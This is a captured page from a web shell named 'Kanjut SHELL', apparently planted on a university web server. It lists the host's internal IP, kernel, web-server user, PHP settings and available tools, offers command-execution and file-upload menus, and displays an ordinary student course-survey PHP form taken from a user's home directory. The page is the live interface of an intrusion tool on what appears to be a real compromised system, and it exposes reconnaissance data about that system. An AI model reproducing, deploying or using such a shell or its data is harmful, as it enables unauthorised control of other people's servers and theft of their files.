Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.133.144.147
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/mdwiberg/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mdwiberg/public_html/SecureSurvey.php
<?php   session_start();

        $name = $_POST['name'];
        $_SESSION['name2'] = $name;
	$course = $_POST['course'];
        $_SESSION['course2'] = $course;
	$ge = $_POST['ge'];
        $_SESSION['ge1'] = $ge;
        $gd = $_POST['gd'];
        $_SESSION['gd1'] = $gd;

?>

<CENTER>
<H2>
<font color=indigo size=6>
Course Questions
</font>
</H2>
<HR>

<font color=maroon size=4>
<FORM action=securesurvey.php method=post>

This course has prepared me for the future:
Strongly Agree   <INPUT type=radio name=ag value=sa>
Agree   <INPUT type=radio name=ag value=a>
Disagree   <INPUT type=radio name=ag value=da>
<P>

This course has been very enjoyable:
Strongly Agree   <INPUT type=radio name=ag2 value=sa1>
Agree   <INPUT type=radio name=ag2 value=a1>
Disagree   <INPUT type=radio name=ag2 value=da1>
<P>

There was enough time allowed for homework:
Strongly Agree   <INPUT type=radio name=ag3 value=sa2>
Agree   <INPUT type=radio name=ag3 value=a2>
Disagree   <INPUT type=radio name=ag3 value=da2>
<P>

The classwork related to the homework:
Strongly Agree   <INPUT type=radio name=ag4 value=sa3>
Agree   <INPUT type=radio name=ag4 value=a3>
Disagree   <INPUT type=radio name=ag4 value=da3>
<P>
</font>


Any Additional Comments:
<P>
<textarea rows=10px cols=50px name=txt>
</textarea>
<P>


<P>
<INPUT type=submit value="Submit">
<INPUT type=reset value="Reset">
</FORM>

</CENTER>


Stv3n404 - 2023